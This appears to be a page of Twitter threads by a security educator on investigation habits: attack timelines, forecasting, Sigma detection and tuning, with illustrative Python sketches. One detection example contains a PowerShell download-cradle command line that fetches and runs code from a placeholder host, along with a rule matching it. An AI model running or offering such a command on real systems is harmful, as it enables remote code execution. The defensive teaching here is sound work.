Let's talk about some lessons from watching a student go, over a weekend, from struggling with an investigation lab and...

"I'm stuck"

to finished and...

"I don’t know if you just Yoda’d the hell out of me or what"

1/x
This particular student emailed to say they were stuck and shared some miscellaneous facts they had discovered. I responded and asked them to lay out a timeline of what they already knew so we could work together to spot the gaps. 2/
The truth is that when this inquiry is taken seriously, it doesn't often result in us having to spot those gaps together at all because the student figures it out on their own. Why does this happen? Two main reasons... 3/
First, when forced to revisit an investigation and build an actual timeline, analysts notice gaps to pursue or things that they missed. 4/
I can't stress enough how important this skill is. I've seen it over and over again in my empirical research on highly skilled analysts. Experts constantly revisit what they've found and conceptualize it all on a timeline. 5/
Analysts with lots of working memory capacity can sometimes do this in their heads, while those with lower WM capacity are more likely to write it down. The complexity of the attack plays a factor here as well. 6/
Every new significant piece of information an analyst discovers means processing its meaning... on its own, in relation to the entities and relationships around it, and in relation to the broader attack timeline. 7/
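As a concrete illustration of "writing it down," here's a minimal Python sketch of that timeline-building habit. The events, evidence sources, and gap threshold are all hypothetical, invented for illustration: the point is just that sorting discovered events chronologically makes the unexplained gaps jump out.

```python
from datetime import datetime, timedelta

# Hypothetical event records an analyst might have collected so far:
# (timestamp, evidence source, what was observed). Not real data.
events = [
    ("2021-08-20 14:32", "edr",   "Malicious macro spawned powershell.exe on HOST-7"),
    ("2021-08-20 09:15", "email", "Phishing message delivered to user jdoe"),
    ("2021-08-21 02:47", "auth",  "Service account logged into HOST-12 from HOST-7"),
    ("2021-08-20 14:35", "proxy", "HOST-7 beaconing to unfamiliar external domain"),
]

def build_timeline(events, gap_threshold=timedelta(hours=6)):
    """Sort discovered events chronologically and flag large gaps
    that may indicate activity the analyst hasn't found yet."""
    parsed = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M"), src, desc)
        for ts, src, desc in events
    )
    lines = []
    prev = None
    for ts, src, desc in parsed:
        if prev and ts - prev > gap_threshold:
            lines.append(f"  ... gap of {ts - prev} -- what happened here?")
        lines.append(f"{ts:%Y-%m-%d %H:%M} [{src:>5}] {desc}")
        prev = ts
    return lines

for line in build_timeline(events):
    print(line)
```

Here the 12-hour stretch between the proxy beaconing and the overnight service-account logon gets flagged, which is exactly the kind of gap an analyst would go hunt in.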
Second, when jumping into evidence without an explicit purpose, analysts are more likely to miss things. In this case, the analyst had looked at authentication logs many times but skipped right over the service account being used for lateral movement from an infected host. 8/
Investigations don't always reveal things in the order they happened. When you revisit things in a timeline, it's easier to connect the meaning between events. You're more likely to understand the significance of an evidence source and what is potentially there. 9/
For this analyst, they had mostly stumbled into auth logs in the first place. When they revisited the attack timeline while knowing where they were in it, the lateral movement stood out more. 10/
So here, it's all about the lens through which you view evidentiary data. As your lens shifts, viewing the same data can reveal new things. It's how experts operate and how inexperienced analysts learn. 11/
So... Jedi mind trick? No. But, when you stop to think back through the timeline of events, gaps and connections are more easily revealed. 12/12

More from @chrissanders88

19 Aug
One of the things I absolutely love about our new @sigma_hq course is that one of the final challenges involves building your own new rule (we provide a bunch of ideas) with the option of actually submitting it to the public repo. Folks learn and contribute detection value back to the community.
@sigma_hq As part of that, @DefensiveDepth walks students through the process, even if they've never used git before. The Sigma community also does a great job of providing input and additional testing.
It's awesome to watch it all come together. I'm looking at a rule in the public repo now written by a student who didn't know anything about Sigma a month ago. It's been tested, vetted, and now it'll help folks find some evil.
18 Aug
I don't know who needs to hear this today but cyber security work is really hard. Even at the entry level, it's difficult work.

People around you too easily forget that because of the curse of knowledge -- we can't remember what it was like to not know something we know.
Prevalence of incomplete information, lots of inputs, tons of tacit knowledge, an ill-defined domain, high working memory demands, poor tooling and UX, lack of best practices, interpersonal challenges... I could go on. It's really hard.
Even if everybody around you seems to make it look easy -- it isn't. This stuff is complex, difficult, and mentally demanding.
21 Jul
One of the more helpful things new analysts can do is to read about different sorts of attacks and understand the timeline of events that occurred in them. This enables something called forecasting, which is an essential skill. Let's talk about that. 1/
Any alert or finding that launches an investigation represents a point on a potential attack timeline. That timeline already exists, but the analyst has to discover its remaining elements to decide if it's malicious and if action should be taken. 2/
Good analysts look at an event and consider what sort of other events could have led to it or followed it that would help them make a judgment about the sequence's disposition. 3/
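One way to picture forecasting is as a mental lookup from an observed event to the events that plausibly precede or follow it on the attack timeline. The sketch below uses made-up event names and mappings, not any real taxonomy; it's only meant to show the shape of the skill.

```python
# Hypothetical forecasting table: for an observed event type, which
# kinds of events plausibly come before or after it on the attack
# timeline? Event names and mappings are illustrative only.
FORECASTS = {
    "powershell_download_cradle": {
        "likely_before": ["phishing email delivery", "malicious macro execution"],
        "likely_after": ["C2 beaconing", "credential dumping", "lateral movement"],
    },
    "service_account_remote_logon": {
        "likely_before": ["credential theft on source host", "initial compromise"],
        "likely_after": ["data staging", "further lateral movement"],
    },
}

def forecast(event_type):
    """Return the hypothesized earlier and later events to hunt for."""
    f = FORECASTS.get(event_type, {"likely_before": [], "likely_after": []})
    return f["likely_before"], f["likely_after"]

before, after = forecast("powershell_download_cradle")
print("Look earlier for:", before)
print("Look later for:", after)
```

Reading attack write-ups is essentially how analysts populate this table in their heads.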
24 Jun
While we're doing a Detection Engineering AMA, how do you build these sorta skills if you want to do that job for a living? Big question, but I'd focus on three areas for early career folks...
Investigative Experience -- Tuning detections involves investigating the alerts that signatures generate, so you need to be able to do that at some level. A year or two of SOC experience is a good way to start.
Detection Syntax -- You have to be able to express detection logic. Suricata for network traffic, Sigma for logs, YARA for files. Learn those and you can detect a lot of evil. They translate well to vendor-specific stuff.
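To make "expressing detection logic" concrete: Sigma rules are YAML describing field/value conditions over log events, which tools like the Sigma converters compile to backend-specific queries. The hand-rolled Python matcher below is not real Sigma tooling, just an illustrative sketch of the kind of matching such rules express; the rule, field names, and event are invented.

```python
# Illustrative Sigma-style rule: match events where the process image
# ends with \powershell.exe AND the command line contains a download
# cradle. Real Sigma is YAML evaluated by dedicated tooling; this
# simplified matcher exists only to show the logic.
rule = {
    "title": "Suspicious PowerShell Download Cradle (example)",
    "selection": {
        "Image|endswith": r"\powershell.exe",
        "CommandLine|contains": "DownloadString",
    },
}

def matches(rule, event):
    """Return True if every selection condition holds for the event."""
    for key, expected in rule["selection"].items():
        field, _, modifier = key.partition("|")
        value = str(event.get(field, ""))
        if modifier == "endswith":
            if not value.lower().endswith(expected.lower()):
                return False
        elif modifier == "contains":
            if expected.lower() not in value.lower():
                return False
        else:  # no modifier: exact match
            if value != expected:
                return False
    return True

event = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": "powershell -nop -c IEX (New-Object "
                   "Net.WebClient).DownloadString('http://example.test/a')",
}
print(matches(rule, event))  # -> True
```

Once you can reason about logic like this, the vendor-specific query languages are mostly a syntax change.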
24 Jun
This relates to my 4th and 5th reasons why these decisions happen -- AV company tactics and giving folks what they need to tune rules. That actually means GIVING analysts the rule logic. I could go on and on about this.
Most companies don't want to give out their rule logic because they see it as a sensitive trade secret. This is nonsense. A rule set isn't a detection company's most valuable intellectual property; that's its processes for creating those rules and the staff who do the work.
Limiting access to detection logic makes it harder for your customer. It is MUCH more difficult to investigate alerts when you don't know what they are actually detecting and how they're doing it.
24 Jun
I usually see two things.

1. Analysts don't have the skills to perform tuning.

2. Management won't prioritize time for it or train analysts to do it.

I rarely see #2 get rectified until new management comes in who understands the importance of tuning.
I've seen many good analysts give clear, compelling explanations as to why tuning is important but fail to convince the decision-makers that this needs a dedicated person or a day a week from an existing person.
The thing that needs to become more commonly accepted is that if you decide your company needs a SOC, then that has to include a detection tuning capability. It also needs to be run by people who've seen this thing work well.
